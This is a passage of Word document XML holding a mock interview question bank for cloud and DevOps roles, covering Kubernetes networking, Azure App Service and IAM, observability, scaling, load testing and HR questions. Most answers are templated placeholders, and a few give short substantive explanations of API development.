        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/NetworkPolicy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/NetworkPolicy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Can NetworkPolicy solve this problem?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q32. How would you whitelist an organization's CIDR/IP range?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking/Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Networking/Security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whitelist an organization's CIDR/IP range?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q33. What is the role of an Internal Load Balancer?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking/Load Balancer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Networking/Load Balancer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role of an Internal Load Balancer?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q34. What is service-to-service authentication?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/Service Auth</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Security/Service Auth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service-to-service authentication?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q35. How do two services communicate securely?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Security/Service Auth</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Security/Service Auth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two services communicate securely?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q36. How would an App Service communicate with PostgreSQL?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Azure/PostgreSQL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Azure/PostgreSQL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an App Service communicate with PostgreSQL?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q37. How would you authorize App Service to access PostgreSQL?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Azure/IAM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Azure/IAM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authorize App Service to access PostgreSQL?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q38. How do Managed Identities work?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Azure/IAM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Azure/IAM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Managed Identities work?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q39. How do you provide Contributor access to an App Service?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Azure/IAM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Azure/IAM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provide Contributor access to an App Service?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q40. What is Azure App Service?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Azure/App Service</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Azure/App Service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Azure App Service?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q41. What is App Service used for?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Azure/App Service</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Azure/App Service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App Service used for?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q42. How do applications hosted on App Service connect to a database?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Azure/App Service</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Azure/App Service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applications hosted on App Service connect to a database?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q43. How comfortable are you with API development?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>APIs/Development</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the APIs/Development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comfortable are you with API development?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q44. Have you built APIs yourself?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>APIs/Development</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the APIs/Development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built APIs yourself?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q45. How does an API read and write data to a database?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>APIs/Database</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The API receives a request, validates it, authenticates and authorizes the caller, then calls a service or repository layer to interact with the database. For reads, it queries data, maps it to a response model, and returns it. For writes, it validates business rules, starts a transaction if needed, writes data, commits, and returns a response. In production, I use connection pooling, parameterized queries or ORM protections, migrations, indexes, timeouts, and clear transaction boundaries.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q46. What is your understanding of API development?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>APIs/Development</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: API development is about exposing a controlled interface for clients to interact with backend business logic and data. A good API defines clear endpoints, request and response schemas, authentication, authorization, validation, error handling, versioning, observability, and documentation. In production, API work is not only writing routes. It includes database access patterns, rate limiting, security headers, logging, tracing, performance testing, backward compatibility, and deployment strategy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q47. How would you build an observability namespace?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability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build an observability namespace?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q48. Which services would you use for metrics, logs, and traces?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability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services would you use for metrics, logs, and traces?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q49. How would you integrate Grafana?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability/Grafana</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability/Grafana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integrate Grafana?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q50. What exactly is OpenTelemetry?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability/OpenTelemetry</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability/OpenTelemetry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exactly is OpenTelemetry?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q51. OpenTelemetry is only a collector; what backend services would you use?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability/OpenTelemetry</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability/OpenTelemetry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OpenTelemetry is only a collector; what backend services would you use?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q52. How would Grafana connect to those services?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability/Grafana</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability/Grafana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Grafana connect to those services?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q53. Suppose millions of users access your API. How would you design a scalable Kubernetes solution?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Scalability/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Scalability/Kubernetes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Suppose millions of users access your API. How would you design a scalable Kubernetes solution?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q54. How would you determine your scaling strategy?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Scalability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Scalability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determine your scaling strategy?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q55. How would you estimate the number of pods?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Scalability/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Scalability/Kubernetes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estimate the number of pods?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q56. How would you perform load testing?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Load Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Load Testing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perform load testing?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q57. Can you generate 5,000 requests per second?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Load Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Load Testing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Can you generate 5,000 requests per second?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q58. Which load-testing tools would you use?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Load Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Load Testing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load-testing tools would you use?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q59. How is your understanding of the latest GenAI/MLOps journey?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MLOps/AI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the MLOps/AI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is your understanding of the latest GenAI/MLOps journey?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q60. Do you have any questions for me?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>HR/Behavioral</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the HR/Behavioral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 you have any questions for me?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q61. Where are you currently based?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>HR/Behavioral</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the HR/Behavioral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Where are you currently based?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q62. What is your native place?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>HR/Behavioral</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the HR/Behavioral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your native place?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 72 - Kubernetes Terraform Observability and MLOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Explain CNI in Kubernetes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes/Networking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CNI in Kubernetes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Which CNI have you worked on?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes/Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
